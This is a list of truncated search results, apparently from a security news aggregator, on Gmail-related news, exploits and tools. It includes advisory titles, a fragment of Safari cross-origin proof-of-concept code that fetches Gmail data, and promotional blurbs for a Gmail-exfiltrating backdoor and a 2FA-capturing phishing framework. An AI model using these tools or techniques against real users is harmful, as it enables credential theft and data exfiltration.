527 matches found
Google Redesigns Gmail – Here's a List of Amazing New Features
Google has finally been rolling out its new massively redesigned Gmail for desktop and mobile to 1.4 billion users worldwide, which might be the most significant single upgrade in Gmail's history. This huge revamped version of the email service now offers plenty of new features such as...
A week in security (April 16 – April 22)
Last week, we took a stroll down memory lane talking about Facebook and MySpace, noticed a change in the Magnitude exploit kit—wherein it started adopting the GandCrab ransomware, took a good look at a new form of adware that is based on Python, chatted a bit about Russian hacking with a...
On Dark Web Your Facebook ID is worth $5.20 & Gmail ID just $1
By Waqas. Recently we reported about a massive data breach scandal that... This is a post from HackRead.com. Read the original post: On Dark Web Your Facebook ID is worth $5.20 & Gmail ID just $1
Powershell-RAT - Python Based Backdoor That Uses Gmail To Exfiltrate Data Through Attachment
Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. This RAT will help someone during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment. Note: This...
Apple Promises Fix for Latest ‘Text Bomb’ Bug As Abuse Spreads
UPDATE: Apple said it is working on a fix for the latest text bomb bug that crashes a number of iOS and Mac apps that display specific Telugu language characters. On Monday, it made good on the promise and announced the availability of a patch (CVE-2018-4124) for iOS 11.2.6, watchOS 4.2.3, tvOS...
Security update for webkit2gtk3 (important)
This update for webkit2gtk3 fixes the following issues: Update to version 2.18.5: + Disable SharedArrayBuffers from Web API. + Reduce the precision of "high" resolution time to 1ms. + bsc1075419 - Security fixes: includes improvements to mitigate the effects of Spectre and Meltdown CVE-2017-5753...
Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download Exploit
There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name and any contents can be written to anywhere on the filesystem that the Gma...
Android Gmail 7.11.5.176568039 - Directory Traversal in Attachment Download
(Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1342) There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment...
Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download
(Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1342) There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name...
CommuniGatePro 6.1.16 Cross Site Scripting Vulnerability
CommuniGatePro version 6.1.16 suffers from multiple stored cross site scripting vulnerabilities. Exploit Title: CommuniGatePro webmails Multiple Stored XSS Exploit Author: Boumediene KADDOUR Unit: Algerie Telecom R&D Unit Vendor Homepage: https://www.stalker.com/ Software Link:...
CommuniGatePro 6.1.16 Cross Site Scripting
Exploit Title: CommuniGatePro webmails Multiple Stored XSS Date: 15/11/2017 Exploit Author: Boumediene KADDOUR Unit: Algerie Telecom R&D Unit Vendor Homepage: https://www.stalker.com/ Software Link: http://www.stalker.com/ paid product Version: 6.1.16 Tested on: production server on crystal, pron...
Terdot Trojan likes social media
We usually advise people that have fallen victim to banker Trojans to change all their passwords, especially the ones that are related to their financial sites and apps. Besides the dangers of re-used passwords, there are other reasons why this is important. This advice is especially applicable t...
CommuniGatePro 6.1.16 - Cross-Site Scripting
Exploit Title: CommuniGatePro webmails Multiple Stored XSS Date: 15/11/2017 Exploit Author: Boumediene KADDOUR Unit: Algerie Telecom R&D Unit Vendor Homepage: https://www.stalker.com/ Software Link: http://www.stalker.com/ paid product Version: 6.1.16 Tested on: production server on crystal, pron...
Phishing Biggest Threat to Google Account Security
Last year may have been mostly about ransomware, but it’s difficult to forget the billion or so passwords that were spilled in high-profile breaches and credential leaks. Google and researchers from the University of California Berkeley attempted to ease some of that pain, and teamed up to analyz...
CredSniper - Phishing Framework which supports SSL and capture credentials with 2FA tokens
Easily launch a new phishing site fully presented with SSL and capture credentials along with 2FA tokens using CredSniper. The API provides secure access to the currently captured credentials which can be consumed by other applications using a randomly generated API token. Benefits Fully supporte...
On ROCA, KRACK, BoundHook, Google Advanced Protection
Threatpost editors Mike Mimoso and Tom Spring recap this week’s infosec news starting with the ROCA vulnerabilities affecting factorization of RSA private keys, the KRACK WPA2 Wi-Fi vulnerabilities, the BoundHook attacks, and Google’s introduction of Advanced Protection for Gmail. Download: Music...
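Safari 10 cross-origin vulnerability
In Safari 10, XMLHttpRequest under the null origin can freely make cross-origin requests and set HTTP headers. After I submitted a bug report to Apple and emailed them, they quietly fixed the vulnerability themselves without even sending me an email, so I decided to publish the PoC. This is a screenshot I took before the vulnerability was fixed: This vulnerability can bypass the same-origin policy and allow arbitrary cross-origin access; this is the code I wrote to fetch Gmail data: html var serveraddress = 'http://127.0.0.1:8000/static/csrfWcn6h/' function deleteSelf let test = document.getElementById'test'...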
How SS7 Flaw Can Be Used to Hack Gmail ID and Bitcoin Wallet
By Waqas. An old vulnerability in the Signalling System No. 7 (SS7)... This is a post from HackRead.com. Read the original post: How SS7 Flaw Can Be Used to Hack Gmail ID and Bitcoin Wallet
LinkedIn Phishing Scam Steals Gmail Credentials Through Google Docs
By Waqas. LinkedIn, a business and employment-oriented social networking website contain personal information... This is a post from HackRead.com. Read the original post: LinkedIn Phishing Scam Steals Gmail Credentials Through Google Docs